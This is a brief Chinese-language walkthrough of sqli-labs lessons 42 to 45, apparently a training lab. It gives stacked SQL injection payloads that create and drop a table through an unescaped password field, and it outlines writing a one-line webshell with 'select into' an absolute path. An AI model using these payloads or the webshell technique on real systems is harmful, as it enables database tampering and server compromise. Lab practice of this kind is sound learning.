lesson42_45

lesson42

通过检测，username这里有对当引号进行转义。而password这里没有，所以尝试对password处进行注入

在这里把type改为text就可以看到密码了

在password里面尝试堆叠注入

数据包裹方式为单引号

a’;create table wds5418 like users;#

虽然显示报错但是我们成功的创建了表

然后用

a’;drop table wds5418;#

来删除表

lesson43

与lesson42相同只是对数据的包裹方式不同罢了，一模一样的堆叠注入

a’);create table wds5418 like users;#

a’);drop table wds5418;#

lesson44

无回显信息的注入，注入的方法和42和43一样，payload和42一样

a’;create table wds5418 like users;#

a’;drop table wds5418;#

lesson45

也无回显的错误信息，注入方式和44关和44一样数据包裹不一样

a’);create table wds5418 like users;#

a’);drop table wds5418;#

总结：

堆叠注入的题目是开放的，因为堆叠注入可以执行所以语句。

网上还有师傅用堆叠注入写入一句话木马，由此可见宽字节的危害

1. 权限
2. 一句话木马
3. select XX into XXX
4. 绝对路径

select ‘‘ into ‘绝对路径’